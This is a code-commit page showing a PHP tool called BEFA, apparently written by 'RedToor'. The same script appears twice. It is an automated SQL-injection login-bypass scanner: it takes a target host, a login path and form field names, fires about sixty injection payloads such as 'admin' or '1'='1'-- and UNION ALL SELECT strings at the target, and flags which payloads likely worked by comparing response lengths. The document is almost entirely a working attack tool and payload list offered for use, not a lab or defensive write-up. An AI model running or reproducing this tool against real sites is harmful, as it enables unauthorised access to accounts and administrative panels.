RedToor · October 18, 2016 06:04
diff --git a/befa.php b/befa.php
 <?php
 /* 
   Coder  : [f][t] \ RedToor 
   Project: BEFA [Bypass Head for authentication]
   Date 1 : 11/08/2014 Vs 1
   Date 2 : 11/19/2014 Vs 2
   Date 3 : 10/18/2016 Vs 3

   	how it works
 	
                  www.target.com
                        /
            www.target.com/admin/login.php ->  <form name="form" action="verify.php" method="post">
            								    User <input type="text" name="username">
            									Pass <input type="text" name="password">
            									<input type="submit" value="login"></form> 
            									      /
            						www.target.com/admin/verify.php [username&password]  
            						                /
            				POST /admin/verify.php HTTP/1.1               
   						    Host: www.target.com
   							Content-Type: application/x-www-form-urlencoded
 	                        Content-Length: number of letters
    						username={payload}&password=password{payload}
    							              /
 										verify.php
    							       		/
 			MYSQL -> "SELECT * FROM users WHERE username='{payload}' AND password='{payload}'"
    									  /
    							  RESULT (YES) (NO)

 */

 error_reporting(0);


 // Data
 $HOST=$_POST['HOST'];
 $URL=$_POST['URL'];
 $DATA1=$_POST['DATA1'];
 $DATA2=$_POST['DATA2'];
 $DATA3=$_POST['DATA3'];
 $DATA4=$_POST['DATA4'];
 $TYPE=$_POST['TYPE'];

 if (empty($HOST))
 {
 ?>
 	<!-- Script by RedToor -->
 	<title>Befa By RedToor</title>
 	<table width="100%" border="0" height="100%" cellspacing="0">
 	<td valign="middle">
 	<div align="center">
 	<OBJECT classid>
 	<h1><font style="font-family: fantasy">Bypass Head for authentication</font></h1>
 	<form method="POST" action="<?php echo $_SERVER['PHP_SELF'] ?>"><pre>


      HOST  : <input type="text" name="HOST"  placeholder="www.target.com"    > As www.target.com 	.
      PATH  : <input type="text" name="URL"   placeholder="admin/verify.php"  > As admin/login.php 	.
 INPUT NAME  : <input type="text" name="DATA1" placeholder="username"          > As user 		.
 INPUT NAME 2: <input type="text" name="DATA2" placeholder="passwd"            > As pass 		.
 INPUT NAME 3: <input type="text" name="DATA3" placeholder="other" size="7">=<input type="text" name="DATA4" placeholder="value" size="7"> As other [If need]	.

 so user=[payload]&pass=[payload]&other=value

 METHOD: POST<input type="radio" name="TYPE" value="POST" checked="checked"> GET<input type="radio" name="TYPE" value="GET">
 <br><input type="submit" value="Start"></form>
 	</pre>
 <?php
 }else{

 // ----------------------------------------------------------- Payloads
 $payload=array(
 			"test",
 			"0' or 0=0'#",
 	        "' or ''='",
 	        "' or ''=''",
 	        "0' or '0'=0'#",
 	        "0' or ''='#",
 	        "' or ''='#",
 	        "1' or '1'=1'#",
 	        "1'1",
 	        "1 EXEC SP_ (or EXEC XP_)",
 	        "1 AND 1=1",
 			"or 1=1",
 			"or 1=1--",
 			"or 1=1#",
 			"or 1=1/*",
 			"admin",
 			"admin' --",
 			"admin' #",
 			"admin'/*",
 			"admin' or '1'='1",
 			"admin' or '1'='1'--",
 			"admin' or '1'='1'#",
 			"admin' or '1'='1'/*",
 			"admin' or 1=1 or ''='",
 			"admin' or 1=1",
 			"admin' or 1=1--",
 			"admin' or 1=1#",
 			"admin' or 1=1/*",
 			"admin') or ('1'='1",
 			"admin') or ('1'='1'--",
 			"admin') or ('1'='1'#",
 			"admin') or ('1'='1'/*",
 			"admin') or '1'='1",
 			"admin') or '1'='1'--",
 			"admin') or '1'='1'#",
 			"admin') or '1'='1'/*",
 			"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
 			"admin\" --",
 			"admin\" #",
 			"admin\"/*",
 			"admin\" or \"1\"=\"1\"",
 			"admin\" or \"1\"=\"1\"--\"",
 			"admin\" or \"1\"=\"1\"#",
 			"admin\" or \"1\"=\"1\"/*",
 			"admin\"or 1=1 or \"\"=\"",
 			"admin\" or 1=1",
 			"admin\" or 1=1--",
 			"admin\" or 1=1#",
 			"admin\" or 1=1/*",
 			"admin\") or (\"1\"=\"1",
 			"admin\") or (\"1\"=\"1\"--",
 			"admin\") or (\"1\"=\"1\"#",
 			"admin\") or (\"1\"=\"1\"/*",
 			"admin\") or \"1\"=\"1\"",
 			"admin\") or \"1\"=\"1\"--",
 			"admin\") or \"1\"=\"1\"#",
 			"admin\") or \"1\"=\"1\"/*",
 			"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055",
 	         );
 // ----------------------------------------------------------- Payloads


 $ver=strpos($HOST, "http://");
 if($ver===false){}else{$HOST=str_replace("http://", "", $HOST);$HOST=str_replace("/", "", $HOST);}
 print '<br><title>Befa By RedToor</title><center><h3><font style="font-family: fantasy">B.E.F.A</font></h3></center><div align="center">';

 if($TYPE=="POST"){$TYPE="application/x-www-form-urlencoded";$METHOD="POST";}else{$TYPE="text/html";$METHOD="GET";}
 echo '<table border="2px"> <tr>
              <td>Payload</td>
              <td>Lentgh</td>
              <td>Probability</td>
 	</tr>';
 $check=0;
 $last_fail=0;
 foreach ($payload as $pay) {
 	$inputs = http_build_query(
 					array(
 			        ''.$DATA1.'' => $pay,
 			        ''.$DATA2.'' => $pay,
 			        ''.$DATA3.'' => $DATA4
 					    )
 					);
 	$payloads = array('http' =>
 					array(
 	        			'method'  => $METHOD,
 	        			'header'  => "Content-type: ".$TYPE,
 	        			'content' => $inputs
 					)
 				);

 	$context = stream_context_create($payloads);
 	$request = file_get_contents("http://".$HOST."/".$URL, false, $context);
 	if ($check!=strlen(utf8_decode($request)) and $last_fail!=strlen(utf8_decode($request))){$status="<i>YES</i>";$last_fail=$check;}else{$status="NO";}
 	if ($pay!="test"){
 		echo "<tr><td>".$pay."</td>";
 		echo "<td>".strlen(utf8_decode($request))."</td>";
 		echo "<td>".$status."</td></tr>";
 		}
 		$check = strlen(utf8_decode($request));
 	}echo "</table>";
 }
 ?>
	<?php
	/*
	Coder : [f][t] \ RedToor
	Project: BEFA [Bypass Head for authentication]
	Date 1 : 11/08/2014 Vs 1
	Date 2 : 11/19/2014 Vs 2
	Date 3 : 10/18/2016 Vs 3

	how it works

	www.target.com
	/
	www.target.com/admin/login.php -> <form name="form" action="verify.php" method="post">
	User <input type="text" name="username">
	Pass <input type="text" name="password">
	<input type="submit" value="login"></form>
	/
	www.target.com/admin/verify.php [username&password]
	/
	POST /admin/verify.php HTTP/1.1
	Host: www.target.com
	Content-Type: application/x-www-form-urlencoded
	Content-Length: number of letters
	username={payload}&password=password{payload}
	/
	verify.php
	/
	MYSQL -> "SELECT * FROM users WHERE username='{payload}' AND password='{payload}'"
	/
	RESULT (YES) (NO)

	*/

	error_reporting(0);


	// Data
	$HOST=$_POST['HOST'];
	$URL=$_POST['URL'];
	$DATA1=$_POST['DATA1'];
	$DATA2=$_POST['DATA2'];
	$DATA3=$_POST['DATA3'];
	$DATA4=$_POST['DATA4'];
	$TYPE=$_POST['TYPE'];

	if (empty($HOST))
	{
	?>
	<!-- Script by RedToor -->
	<title>Befa By RedToor</title>
	<table width="100%" border="0" height="100%" cellspacing="0">
	<td valign="middle">
	<div align="center">
	<OBJECT classid>
	<h1><font style="font-family: fantasy">Bypass Head for authentication</font></h1>
	<form method="POST" action="<?php echo $_SERVER['PHP_SELF'] ?>"><pre>


	HOST : <input type="text" name="HOST" placeholder="www.target.com" > As www.target.com .
	PATH : <input type="text" name="URL" placeholder="admin/verify.php" > As admin/login.php .
	INPUT NAME : <input type="text" name="DATA1" placeholder="username" > As user .
	INPUT NAME 2: <input type="text" name="DATA2" placeholder="passwd" > As pass .
	INPUT NAME 3: <input type="text" name="DATA3" placeholder="other" size="7">=<input type="text" name="DATA4" placeholder="value" size="7"> As other [If need] .

	so user=[payload]&pass=[payload]&other=value

	METHOD: POST<input type="radio" name="TYPE" value="POST" checked="checked"> GET<input type="radio" name="TYPE" value="GET">
	<br><input type="submit" value="Start"></form>
	</pre>
	<?php
	}else{

	// ----------------------------------------------------------- Payloads
	$payload=array(
	"test",
	"0' or 0=0'#",
	"' or ''='",
	"' or ''=''",
	"0' or '0'=0'#",
	"0' or ''='#",
	"' or ''='#",
	"1' or '1'=1'#",
	"1'1",
	"1 EXEC SP_ (or EXEC XP_)",
	"1 AND 1=1",
	"or 1=1",
	"or 1=1--",
	"or 1=1#",
	"or 1=1/*",
	"admin",
	"admin' --",
	"admin' #",
	"admin'/*",
	"admin' or '1'='1",
	"admin' or '1'='1'--",
	"admin' or '1'='1'#",
	"admin' or '1'='1'/*",
	"admin' or 1=1 or ''='",
	"admin' or 1=1",
	"admin' or 1=1--",
	"admin' or 1=1#",
	"admin' or 1=1/*",
	"admin') or ('1'='1",
	"admin') or ('1'='1'--",
	"admin') or ('1'='1'#",
	"admin') or ('1'='1'/*",
	"admin') or '1'='1",
	"admin') or '1'='1'--",
	"admin') or '1'='1'#",
	"admin') or '1'='1'/*",
	"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
	"admin\" --",
	"admin\" #",
	"admin\"/*",
	"admin\" or \"1\"=\"1\"",
	"admin\" or \"1\"=\"1\"--\"",
	"admin\" or \"1\"=\"1\"#",
	"admin\" or \"1\"=\"1\"/*",
	"admin\"or 1=1 or \"\"=\"",
	"admin\" or 1=1",
	"admin\" or 1=1--",
	"admin\" or 1=1#",
	"admin\" or 1=1/*",
	"admin\") or (\"1\"=\"1",
	"admin\") or (\"1\"=\"1\"--",
	"admin\") or (\"1\"=\"1\"#",
	"admin\") or (\"1\"=\"1\"/*",
	"admin\") or \"1\"=\"1\"",
	"admin\") or \"1\"=\"1\"--",
	"admin\") or \"1\"=\"1\"#",
	"admin\") or \"1\"=\"1\"/*",
	"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055",
	);
	// ----------------------------------------------------------- Payloads


	$ver=strpos($HOST, "http://");
	if($ver===false){}else{$HOST=str_replace("http://", "", $HOST);$HOST=str_replace("/", "", $HOST);}
	print '<br><title>Befa By RedToor</title><center><h3><font style="font-family: fantasy">B.E.F.A</font></h3></center><div align="center">';

	if($TYPE=="POST"){$TYPE="application/x-www-form-urlencoded";$METHOD="POST";}else{$TYPE="text/html";$METHOD="GET";}
	echo '<table border="2px"> <tr>
	<td>Payload</td>
	<td>Lentgh</td>
	<td>Probability</td>
	</tr>';
	$check=0;
	$last_fail=0;
	foreach ($payload as $pay) {
	$inputs = http_build_query(
	array(
	''.$DATA1.'' => $pay,
	''.$DATA2.'' => $pay,
	''.$DATA3.'' => $DATA4
	)
	);
	$payloads = array('http' =>
	array(
	'method' => $METHOD,
	'header' => "Content-type: ".$TYPE,
	'content' => $inputs
	)
	);

	$context = stream_context_create($payloads);
	$request = file_get_contents("http://".$HOST."/".$URL, false, $context);
	if ($check!=strlen(utf8_decode($request)) and $last_fail!=strlen(utf8_decode($request))){$status="<i>YES</i>";$last_fail=$check;}else{$status="NO";}
	if ($pay!="test"){
	echo "<tr><td>".$pay."</td>";
	echo "<td>".strlen(utf8_decode($request))."</td>";
	echo "<td>".$status."</td></tr>";
	}
	$check = strlen(utf8_decode($request));
	}echo "</table>";
	}
	?>